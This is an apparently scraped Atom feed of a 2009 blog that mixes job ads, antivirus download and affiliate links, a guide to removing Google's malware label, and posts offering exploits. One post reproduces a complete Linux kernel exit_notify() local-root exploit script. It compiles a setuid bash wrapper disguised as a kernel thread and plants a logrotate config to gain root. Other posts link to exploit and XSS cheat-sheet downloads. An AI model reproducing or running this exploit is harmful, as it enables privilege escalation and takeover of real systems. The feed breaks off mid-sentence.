href="http://www.ziddu.com/download/6670442/Notepad5.4.5Local.zip.html"&gt;click here&lt;/a&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2211767872603727128-634476942642998246?l=source-x.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2211767872603727128/posts/default/634476942642998246'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2211767872603727128/posts/default/634476942642998246'/><link rel='alternate' type='text/html' href='http://source-x.blogspot.com/2009/09/notepad-545-local-ccpp-stack-buffer.html' title='Notepad++ 5.4.5 Local .C/CPP Stack Buffer Overflow POC'/><author><name>buzz</name><uri>http://www.blogger.com/profile/16344231548880076715</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author></entry><entry><id>tag:blogger.com,1999:blog-2211767872603727128.post-4536517104919411491</id><published>2009-07-25T23:41:00.002+07:00</published><updated>2009-07-25T23:48:23.555+07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Download'/><category scheme='http://www.blogger.com/atom/ns#' term='Anti Virus'/><title type='text'>Free Antivirus Computer Security</title><content type='html'>PCMAV Valkyrie Antivirus, PCMAV 2.0c &lt;a href="http://www.ziddu.com/download/5221681/PCMAV20c.rar.html" target="_blank"&gt;Download&lt;/a&gt;&lt;br /&gt;PCMAV Valkyrie Antivirus, PCMAV 2.0b &lt;a href="http://www.ziddu.com/download/4770770/PCM4VV4lkyr13.rar.html" target="_blank"&gt;Download&lt;/a&gt;&lt;br /&gt;Remover Sality antivirus, &lt;a href="http://www.ziddu.com/download/5221731/rmsality.rar.html" target="_blank"&gt;download&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;For another antivirus solution, &lt;a href=" http://hemlet.6dantiv.hop.clickbank.net/?tid=81"&gt;click here&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2211767872603727128-4536517104919411491?l=source-x.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2211767872603727128/posts/default/4536517104919411491'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2211767872603727128/posts/default/4536517104919411491'/><link rel='alternate' type='text/html' href='http://source-x.blogspot.com/2009/07/free-antivirus-computer-security.html' title='Free Antivirus Computer Security'/><author><name>buzz</name><uri>http://www.blogger.com/profile/16344231548880076715</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author></entry><entry><id>tag:blogger.com,1999:blog-2211767872603727128.post-9017627981296675553</id><published>2009-07-25T23:31:00.003+07:00</published><updated>2009-07-25T23:41:34.392+07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Vacancy'/><title type='text'>Senior Services Sales Vacancy</title><content type='html'>&lt;span style="font-weight:bold;"&gt;STOP TALKING, START DOING!&lt;/span&gt;&lt;br /&gt;IBM has always delivered technology innovation to our customers. Now, we partner with them in their business and help them become special company, and to stay special. To make our customers special, we need people who are above the ordinary.&lt;br /&gt;IBM Indonesia recruits best-in-class professionals to deliver best breed of IT Solutions and Services to customers.&lt;br /&gt;Do you have the confidence? Do you have the enthusiasm? Do you have the insights to partner with customers and deliver solutions and have significant positive impact on their business?&lt;br /&gt;&lt;br /&gt;SENIOR SERVICES SALES – FINANCIAL SECTOR&lt;br /&gt;&lt;br /&gt;(POSITION CODE: GTS-0240897)&lt;br /&gt;&lt;br /&gt;Responsibilities:&lt;br /&gt;&lt;span class="fullpost"&gt;&lt;br /&gt;    * Facilitate effort for opportunity identification, applies sales skills to engage and close opportunities with key decision makers.&lt;br /&gt;    * Responsible for sales results for the selected solution with the assigned territory.&lt;br /&gt;    * Understand competition and develops appropriate sales strategy.&lt;br /&gt;    * Maintains deep technical skills of IBM products and working knowledge of other services product portfolio, as well as basic understanding of Infrastructure Solution.&lt;br /&gt;Desired Candidate:&lt;br /&gt;&lt;br /&gt;    * Minimum of Bachelor Degree from any background.&lt;br /&gt;    * Experience in I/T industry in Sales / Account Manager for minimum 5 years.&lt;br /&gt;    * Working experience in handling financial sector.&lt;br /&gt;    * High drive towards achievement.&lt;br /&gt;    * Proficient level for English and Bahasa Indonesia, both written and spoken. &lt;br /&gt;&lt;br /&gt;Submit your application through &lt;a href="http://ibm.com/employment/id" target="_blank"&gt;ibm.com/employment/id&lt;/a&gt;, at the latest by August 15th, 2009. Search for the position code and apply through IBM career portal.&lt;br /&gt;&lt;br /&gt;Only short listed candidates will be contacted.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;source. &lt;a href="http://jobsdb.com" target="_blank"&gt;jobsdb.com&lt;/a&gt;&lt;br /&gt;&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2211767872603727128-9017627981296675553?l=source-x.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2211767872603727128/posts/default/9017627981296675553'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2211767872603727128/posts/default/9017627981296675553'/><link rel='alternate' type='text/html' href='http://source-x.blogspot.com/2009/07/senior-services-sales-vacancy.html' title='Senior Services Sales Vacancy'/><author><name>buzz</name><uri>http://www.blogger.com/profile/16344231548880076715</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author></entry><entry><id>tag:blogger.com,1999:blog-2211767872603727128.post-2401630235388604173</id><published>2009-05-23T22:07:00.003+07:00</published><updated>2009-05-23T22:17:49.003+07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Vacancy'/><category scheme='http://www.blogger.com/atom/ns#' term='Anonymouse'/><title type='text'>Professional Sales Executive for IT Products Vacancy</title><content type='html'>PT InMarc Indonesia is a fast Growing Marketing Agency. We have strong fundamental business in Indonesian Major IT Industries supporting worldwide brand such as Microsoft, Dell and Hewlett Packard. We are looking for the following candidates for our expansion:&lt;br /&gt;Professional Sales Executive for IT Products (SALES)&lt;br /&gt;&lt;br /&gt;Available Position: 10&lt;br /&gt;Work location: Jakarta&lt;br /&gt;Level of education: Min. D3 in Any Major&lt;br /&gt;Work experience: 2 Years, Fresh Graduates are encouraged to Apply but commitment is required.&lt;br /&gt;Gender: Male / Female&lt;br /&gt;Marital Status: Single&lt;br /&gt;Age: 23 – 30 years old&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;General Requirements: &lt;br /&gt;&lt;span class="fullpost"&gt;&lt;br /&gt;    * Living in West or North of Jakarta&lt;br /&gt;    * At least 2 years of experience, Fresh Graduates are encouraged to Apply but commitment is required.&lt;br /&gt;    * Computer Literate is a must&lt;br /&gt;    * Attractive, sociable and Mature&lt;br /&gt;    * Pleasant personality with good communication skill&lt;br /&gt;    * Highly creative, self motivated, strong-drive, good analytical, hard worker and should be able to work under pressure to meet deadline or target&lt;br /&gt;    * Target Oriented &amp; good team work.&lt;br /&gt;    * Have own vehicle (for Sales)&lt;br /&gt;&lt;br /&gt; &lt;br /&gt;&lt;br /&gt;Please send your application letter with detailed resume/CV, stating details of qualifications and summary of experiences, present/ expected salary, and other documents support, current photograph not later than 30 May 2009 after this advertisement to:&lt;br /&gt;&lt;br /&gt;PT InMarc Indonesia&lt;br /&gt;Muara Karang Blok M9 Selatan No.71-72&lt;br /&gt;Jakarta 14450&lt;br /&gt;&lt;a href="mailto:Hrd.inmarc@gmail.com"&gt;Hrd.inmarc@gmail.com&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Or you can check our website on:&lt;br /&gt;www.&lt;a href="http://marathonrewards.com" target="_blank"&gt;marathonrewards.com&lt;/a&gt;; &lt;a href="http://www.hp-runner.com" target="_blank"&gt;www.hp-runner.com&lt;/a&gt;; &lt;a href="http://wm-runner.com" target="_blank"&gt;www.wm-runner.com&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;We are sorry to inform that only short listed candidates will be notified.&lt;br /&gt;&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2211767872603727128-2401630235388604173?l=source-x.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2211767872603727128/posts/default/2401630235388604173'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2211767872603727128/posts/default/2401630235388604173'/><link rel='alternate' type='text/html' href='http://source-x.blogspot.com/2009/05/professional-sales-executive-for-it.html' title='Professional Sales Executive for IT Products Vacancy'/><author><name>buzz</name><uri>http://www.blogger.com/profile/16344231548880076715</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author></entry><entry><id>tag:blogger.com,1999:blog-2211767872603727128.post-1665106775427273936</id><published>2009-05-23T21:51:00.002+07:00</published><updated>2009-05-23T22:06:49.599+07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Tutorial'/><category scheme='http://www.blogger.com/atom/ns#' term='Vulnerability'/><title type='text'>Coppermine Photo Gallery 1.4.22 Remote Exploit</title><content type='html'>Need register_globals = on and magic_quotes_gpc = off&lt;br /&gt;Based on vulnerabilities discussed at http://www.milw0rm.org/exploits/8713&lt;br /&gt;Coppermine Photo Gallery 1.4.22 Remote Exploit&lt;br /&gt;&lt;br /&gt;Coded by girex&lt;br /&gt;&lt;br /&gt;source. &lt;a href="http://www.milw0rm.org/exploits/8736" target="_blank"&gt;milw0rm&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;a href="http://www.ziddu.com/download/4869869/coppermine.rar.html" target="_blank"&gt;download&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Need computer and internet security, &lt;a href="http://hemlet.tccau.hop.clickbank.net/"&gt;click here&lt;/a&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2211767872603727128-1665106775427273936?l=source-x.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2211767872603727128/posts/default/1665106775427273936'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2211767872603727128/posts/default/1665106775427273936'/><link rel='alternate' type='text/html' href='http://source-x.blogspot.com/2009/05/coppermine-photo-gallery-1422-remote.html' title='Coppermine Photo Gallery 1.4.22 Remote Exploit'/><author><name>buzz</name><uri>http://www.blogger.com/profile/16344231548880076715</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author></entry><entry><id>tag:blogger.com,1999:blog-2211767872603727128.post-6559173916962203956</id><published>2009-05-12T10:32:00.002+07:00</published><updated>2009-05-12T10:35:32.289+07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Anti Virus'/><title type='text'>Eset Nod32 Antivirus</title><content type='html'>Integrated, Real-Time Protection against viruses, worms, trojans, spyware, adware, phishing, and hackers. Best detection, fastest performance &amp; smallest footprint. NOD32 Antivirus System provides well balanced, state-of-the-art protection against threats endangering your PC and enterprise systems running various platforms from Microsoft Windows, through a number of UNIX/Linux, Novell, MS DOS operating systems to Microsoft Exchange Server, Lotus Domino and other mail servers.&lt;br /&gt;&lt;span class="fullpost"&gt;&lt;br /&gt;ESET solutions are built on ESET’s one-of-a-kind ThreatSense technology. This advanced heuristics engine enables proactive detection of malware not covered by even the most frequently updated signature-based products by decoding and analyzing executable code in real time, using an emulated environment. By allowing malware to execute in a secure virtual world, ESET is able to clearly differentiate between benign files and even the most sophisticated and cleverly-disguised malware.&lt;br /&gt;Users of Microsoft® Windows® can experience the power and elegance of NOD32’s ThreatSense Technology with ease and comfort. Our single optimized engine offers the best protection from viruses, spyware, adware, phishing attacks, and more. Keep tomorrow’s threats at bay with our proactive detection technology.&lt;br /&gt;&lt;a href="http://www.eset.com/products/nod32.php"&gt;learn more...&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;For another solution, &lt;a href="http://hemlet.6dantiv.hop.clickbank.net/?tid=81"&gt;click here&lt;/a&gt;&lt;br /&gt;&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2211767872603727128-6559173916962203956?l=source-x.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2211767872603727128/posts/default/6559173916962203956'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2211767872603727128/posts/default/6559173916962203956'/><link rel='alternate' type='text/html' href='http://source-x.blogspot.com/2009/05/eset-nod32-antivirus.html' title='Eset Nod32 Antivirus'/><author><name>buzz</name><uri>http://www.blogger.com/profile/16344231548880076715</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author></entry><entry><id>tag:blogger.com,1999:blog-2211767872603727128.post-9045068868643883498</id><published>2009-05-12T10:12:00.003+07:00</published><updated>2009-05-12T10:31:14.016+07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Tutorial'/><category scheme='http://www.blogger.com/atom/ns#' term='XSS'/><title type='text'>XSS (Cross Site Scripting) Cheat Sheet</title><content type='html'>Note from the author: XSS is Cross Site Scripting. If you don't know how XSS (Cross Site Scripting) works, this page probably won't help you. This page is for people who already understand the basics of XSS attacks but want a deep understanding of the nuances regarding filter evasion. This page will also not show you how to mitigate XSS vectors or how to write the actual cookie/credential stealing/replay/session riding portion of the attack. It will simply show the underlying methodology and you can infer the rest. Also, please note my XSS page has been replicated by the OWASP 2.0 Guide in the Appendix section with my permission. However, because this is a living document I suggest you continue to use this site to stay up to date.&lt;br /&gt;&lt;br /&gt;Also, please note that most of these cross site scripting vectors have been tested in the browsers listed at the bottom of the page, however, if you have specific concerns about outdated or obscure versions please download them from Evolt. Please see the XML format of the XSS Cheat Sheet if you intend to use CAL9000 or other automated tools. If you have an RSS reader feel free to subscribe to the Web Application Security RSS feed below, or join the forum&lt;br /&gt;&lt;br /&gt;source. &lt;a href="mailto:h@ckers.org?subject=-rsnake/xss.html "&gt;RSnake&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Download Cheat Sheet, &lt;a href="http://www.ziddu.com/download/4712511/cheatsheat.zip.html" target="_blank"&gt;click here&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;a href="http://hemlet.tccau.hop.clickbank.net/"&gt;hacker safe&lt;/a&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2211767872603727128-9045068868643883498?l=source-x.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2211767872603727128/posts/default/9045068868643883498'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2211767872603727128/posts/default/9045068868643883498'/><link rel='alternate' type='text/html' href='http://source-x.blogspot.com/2009/05/xss-cross-site-scripting-cheat-sheet.html' title='XSS (Cross Site Scripting) Cheat Sheet'/><author><name>buzz</name><uri>http://www.blogger.com/profile/16344231548880076715</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author></entry><entry><id>tag:blogger.com,1999:blog-2211767872603727128.post-3422478751785360376</id><published>2009-04-12T14:20:00.003+07:00</published><updated>2009-04-12T14:26:53.207+07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Tutorial'/><category scheme='http://www.blogger.com/atom/ns#' term='Exploit'/><title type='text'>Linux kernel local root exploit  information</title><content type='html'>#!/bin/sh&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;# gw-notexit.sh: Linux kernel &lt;2.6.29 exit_notify() local root exploit              &lt;br /&gt;# &lt;br /&gt;# by Milen Rangelov (gat3way-at-gat3way-dot-eu)&lt;br /&gt;#&lt;br /&gt;# Based on 'exit_notify()' CAP_KILL verification bug found by Oleg Nestorov.&lt;br /&gt;# Basically it allows us to send arbitrary signals to a privileged (suidroot)&lt;br /&gt;# parent process. Due to a bad check, the child process with appropriate exit signal&lt;br /&gt;# already set can first execute a suidroot binary then exit() and thus bypass&lt;br /&gt;# in-kernel privilege checks. We use chfn and gpasswd for that purpose.&lt;br /&gt;#&lt;br /&gt;# !!!!!!!!!!!&lt;br /&gt;# Needs /proc/sys/fs/suid_dumpable set to 1 or 2. The default is 0 &lt;br /&gt;# so you'll be out of luck most of the time. &lt;br /&gt;# So it is not going to be the script kiddies' new killer shit :-)&lt;br /&gt;# !!!!!!!!!!!&lt;br /&gt;#&lt;br /&gt;# if you invent a better way to escalate privileges by sending arbitrary signals to &lt;br /&gt;# the parent process, please mail me :) That was the best I could think of today :-(&lt;br /&gt;#&lt;br /&gt;# This one made me nostalgic about the prctl(PR_SET_DUMPABLE,2) madness&lt;br /&gt;#&lt;br /&gt;# Skuchna rabota...&lt;br /&gt;#&lt;br /&gt;####################################################################################&lt;br /&gt;&lt;br /&gt;&lt;a href="http://hemlet.tccau.hop.clickbank.net/"&gt;hacker safe&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;&lt;br /&gt;&lt;br /&gt;SUIDDUMP=`cat /proc/sys/fs/suid_dumpable`&lt;br /&gt;if [ $SUIDDUMP -lt 1 ]; then echo -e "suid_dumpable=0 - system not vulnerable!\n";exit; fi&lt;br /&gt;if [ -d /etc/logrotate.d ]; then&lt;br /&gt;echo "logrotate installed, that's good!"&lt;br /&gt;else&lt;br /&gt;echo "No logrotate installed, sorry!";exit&lt;br /&gt;fi&lt;br /&gt;&lt;br /&gt;echo -e "Compiling the bash setuid() wrapper..."&lt;br /&gt;cat &gt;&gt; /tmp/.m.c &lt;&lt; EOF&lt;br /&gt;#include &lt;unistd.h&gt;&lt;br /&gt;#include &lt;sys/types.h&gt;&lt;br /&gt;&lt;br /&gt;int main()&lt;br /&gt;{&lt;br /&gt;    setuid(0);&lt;br /&gt;    execl("/bin/bash","[kthreadd]",NULL);&lt;br /&gt;}&lt;br /&gt;EOF&lt;br /&gt;&lt;br /&gt;cc /tmp/.m.c -o /tmp/.m&lt;br /&gt;rm /tmp/.m.c&lt;br /&gt;&lt;br /&gt;echo -e "Compiling the exploit code..."&lt;br /&gt;&lt;br /&gt;cat &gt;&gt; /tmp/exploit.c &lt;&lt; EOF&lt;br /&gt;#include &lt;stdio.h&gt;&lt;br /&gt;#include &lt;sched.h&gt;&lt;br /&gt;#include &lt;signal.h&gt;&lt;br /&gt;#include &lt;stdlib.h&gt;&lt;br /&gt;#include &lt;unistd.h&gt;&lt;br /&gt;&lt;br /&gt;int child(void *data)&lt;br /&gt;{&lt;br /&gt;    sleep(2);&lt;br /&gt;    printf("I'm gonna kill the suidroot father without having root rights :D\n");&lt;br /&gt;    execl("/usr/bin/gpasswd","%s",NULL);&lt;br /&gt;    exit(0);&lt;br /&gt;}&lt;br /&gt;&lt;br /&gt;int main()&lt;br /&gt;{&lt;br /&gt;    int stacksize = 4*getpagesize();&lt;br /&gt;    void *stack, *stacktop;&lt;br /&gt;    stack = malloc(stacksize);&lt;br /&gt;    stacktop = stack + stacksize;&lt;br /&gt;    chdir("/etc/logrotate.d");&lt;br /&gt;    int p = clone(child, stacktop, CLONE_FILES|SIGSEGV, NULL);&lt;br /&gt;    if (p&gt;0) execl("/usr/bin/chfn","\n/tmp/.a\n{\nsize=0\nprerotate\n\tchown root /tmp/.m;chmod u+s /tmp/.m\nendscript\n}\n\n",NULL);&lt;br /&gt;}&lt;br /&gt;EOF&lt;br /&gt;&lt;br /&gt;cc /tmp/exploit.c -o /tmp/.ex&lt;br /&gt;rm /tmp/exploit.c&lt;br /&gt;&lt;br /&gt;echo -e "Setting coredump limits and running the exploit...\n"&lt;br /&gt;ulimit -c 10000&lt;br /&gt;touch /tmp/.a&lt;br /&gt;`/tmp/.ex &gt;/dev/null 2&gt;/dev/null`&lt;br /&gt;sleep 5&lt;br /&gt;rm /tmp/.ex&lt;br /&gt;&lt;br /&gt;if [ -e /etc/logrotate.d/core ]; then&lt;br /&gt;echo -e "Successfully coredumped into the logrotate config dir\nNow wait until cron.daily executes logrotate and makes your shell wrapper suid\n"&lt;br /&gt;echo -e "The shell should be located in /tmp/.m - just run /tmp/.m after 24h and you'll be root"&lt;br /&gt;echo -e "\nYour terminal is most probably screwed now, sorry for that..."&lt;br /&gt;exit&lt;br /&gt;fi&lt;br /&gt;&lt;br /&gt;echo "The system is not vulnerable, sorry :("&lt;br /&gt;&lt;br /&gt;# &lt;a href="http://milw0rm.com/exploits/8369" target="_blank"&gt;milw0rm.com&lt;/a&gt; [2009-04-08]&lt;br /&gt;&lt;a href="http://hemlet.tccau.hop.clickbank.net/"&gt;hacker safe&lt;/a&gt;&lt;br /&gt;&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2211767872603727128-3422478751785360376?l=source-x.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2211767872603727128/posts/default/3422478751785360376'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2211767872603727128/posts/default/3422478751785360376'/><link rel='alternate' type='text/html' href='http://source-x.blogspot.com/2009/04/linux-kernel-local-root-exploit.html' title='Linux kernel local root exploit  information'/><author><name>buzz</name><uri>http://www.blogger.com/profile/16344231548880076715</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author></entry><entry><id>tag:blogger.com,1999:blog-2211767872603727128.post-5173920283210916216</id><published>2009-04-06T21:19:00.002+07:00</published><updated>2009-04-06T21:25:26.725+07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Tutorial'/><category scheme='http://www.blogger.com/atom/ns#' term='Malware'/><title type='text'>Eliminate the Lable Google Malware Badware</title><content type='html'>There are some the matters require to in knowing:&lt;br /&gt;Malware ( abbreviation of term English Ianguage ) malicious software, meaning the compromising software) is the computer program created for the purpose of and specific-purpose of his creator and is the program look for weakness from software. Generally malware created to leak or destroy a software or system operasi.(Wiki).&lt;br /&gt;&lt;br /&gt;Badware is malicious software that tracks your moves online and feeds that information back to shady marketing groups so that they can ambush you with targeted ads. If your every move online is checked by a pop-up ad, it's highly likely that you, like 59 million Americans, have spyware or other malicious badware on your computer.(Stopbadware.org)&lt;br /&gt;&lt;br /&gt;Google as search engine biggest in world wish to give the result search the cleanness and peaceful to searcher that good from side website and seo, special so for the things from side website, google besides doing crawl he/she also do scanning to website do website the contain script which including category malware/badware or don't.&lt;br /&gt;&lt;br /&gt;In the activity google work along with stopbadware.org to give the information to:&lt;br /&gt;Administrator(Suspect website) usually google will deliver the enamel to:&lt;br /&gt;&lt;br /&gt;buse@website com &lt;br /&gt;admin@website.com &lt;br /&gt;administrator@website.com &lt;br /&gt;contact@website.com&lt;br /&gt;info@website.com * &lt;br /&gt;&lt;span class="fullpost"&gt;&lt;br /&gt;so that you require to make one of the above enamel for precaution to catch the information in delivering by google, if website you is hit Label Malware.&lt;br /&gt;They also inform to public society ( consumer Google Search), that website the contain Malware, by presenting be like this&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://2.bp.blogspot.com/_Ltm3Etcp4Hw/SdoQmmb_pnI/AAAAAAAAAA0/YfoVJfKCMS4/s1600-h/badware1.gif"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 320px; height: 43px;" src="http://2.bp.blogspot.com/_Ltm3Etcp4Hw/SdoQmmb_pnI/AAAAAAAAAA0/YfoVJfKCMS4/s320/badware1.gif" border="0" alt=""id="BLOGGER_PHOTO_ID_5321584165030700658" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Cause:&lt;br /&gt;One of [the] process entry of malware/badware into website you can in causing by existence of virus in your computer, moment update website ( upload file php or html) that good through FTP or Browser hence virus will injection some script malware/badware into page website without you realize before all, so that when google do scanning and find script malware/badware is in website you is hence google will direct give Label Badware/Malware in SERP their.&lt;br /&gt;They also inform to public society ( consumer Google Search), that website the contain Malware.&lt;br /&gt;&lt;br /&gt;Way to overcome:&lt;br /&gt;&lt;br /&gt;To overcome / to eliminate Label Badware/Malware in SERP Google, hence you require to do some matters is :&lt;br /&gt;1. Do the sweeping script malware/badware [at] script website your&lt;br /&gt;2. Ask review on the side of stopbadware.org &lt;br /&gt;3. Ask review side Google&lt;br /&gt;&lt;br /&gt;Special to poin which to 3. that is requesting review side of Google, its way is&lt;br /&gt;&lt;br /&gt;1. You have to have account in google, can in the form of enamel in google.&lt;br /&gt;&lt;br /&gt;2. Step into http://google.com/accounts select;choose Webmaster / Webmaster Tools       &lt;br /&gt;3. If the menu not shown was hence you had to enlist in google webmaster tools formerly.&lt;br /&gt;4. Register website you is in google webmaster tools then do the verification / verify &lt;br /&gt;5. After that verify please enter the menu Overview and click link Review site&lt;br /&gt;&lt;br /&gt;Awaited 2 x 24 Jam, [stopbadware.org will review your website and if website you truely have clear of malware/badware hence they will contact google, then Google will do review directly. &lt;br /&gt;&lt;br /&gt;After they express website you really clean hence Label Badware/Malware in SERP Google will soon in eliminating, usually process the abolition Label this eat the time of 1x24 [hour/clock]... patient thus yes.... :)&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2211767872603727128-5173920283210916216?l=source-x.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2211767872603727128/posts/default/5173920283210916216'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2211767872603727128/posts/default/5173920283210916216'/><link rel='alternate' type='text/html' href='http://source-x.blogspot.com/2009/04/eliminate-lable-google-malware-badware.html' title='Eliminate the Lable Google Malware Badware'/><author><name>buzz</name><uri>http://www.blogger.com/profile/16344231548880076715</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://2.bp.blogspot.com/_Ltm3Etcp4Hw/SdoQmmb_pnI/AAAAAAAAAA0/YfoVJfKCMS4/s72-c/badware1.gif' height='72' width='72'/></entry><entry><id>tag:blogger.com,1999:blog-2211767872603727128.post-1715491054129393789</id><published>2009-03-23T10:24:00.003+07:00</published><updated>2009-03-23T10:34:12.731+07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Anti Virus'/><title type='text'>AVG Internet Security 8.5</title><content type='html'>Comprehensive real-time protection against viruses, spyware, identity theft, poisoned web pages, and all types of malware that can threaten your valuable personal information. Prevention is better than cure! Comprehensive cyberthreat prevention for Windows-based home users from one of the World's most trusted security companies.&lt;br /&gt;&lt;br /&gt;Features :&lt;br /&gt;&lt;br /&gt;All-in-one protection&lt;br /&gt;Antivirus and Anti-Spyware: protection against viruses, worms, spyware, and trojans&lt;br /&gt;Identity Protection: helps prevent identity theft&lt;br /&gt;Anti-Rootkit: protection against hidden threats (rootkits) &lt;br /&gt;Web Shield: screens downloads and IM for infections&lt;br /&gt;LinkScanner: blocks poisoned web pages in real time&lt;br /&gt;Anti-Spam with anti-phishing: filters out unwanted and fraudulent e-mails&lt;br /&gt;Firewall: blocks hacker attacks&lt;br /&gt;System Tools: tailor AVG for your particular needs&lt;br /&gt;Easy-to-use, automated protection&lt;br /&gt;&lt;br /&gt;AVG Internet Security gives you maximum protection with real-time scanning, automatic updates, low-impact background scanning for online threats, and instant quarantining or removal of infected files ensures maximum protection. Every interaction between your computer and the Internet is analyzed to ensure nothing can get onto your system without your knowledge.&lt;br /&gt;&lt;br /&gt;AVG checks in real time:&lt;br /&gt;All files including documents, photos, music, and applications&lt;br /&gt;E-mails (all major email programs like Microsoft Outlook and Thunderbird supported)&lt;br /&gt;Instant messaging and P2P communications&lt;br /&gt;File downloads and online transactions such as shopping and banking&lt;br /&gt;Search results and any other web links you click on&lt;br /&gt;Internet Security – prevention is better than cure&lt;br /&gt;&lt;span class="fullpost"&gt;&lt;br /&gt;AVG Internet Security provides multiple layers of protection to ensure nothing slips through.&lt;br /&gt;NEW Identity Theft Protection prevents new and unknown threats from stealing your personal information like bank and credit card details.&lt;br /&gt;LinkScanner checks every link, making sure you're safe searching the internet and surfing the web, minimizing the risk of you accidentally visiting a poisoned web page.&lt;br /&gt;Web Shield detects and blocks malware threats in file downloads and instant-messaging conversations.&lt;br /&gt;The Firewall stops hackers from accessing and misusing your computer.&lt;br /&gt;Antivirus, Anti-Spyware, and Anti-Rootkit detect and 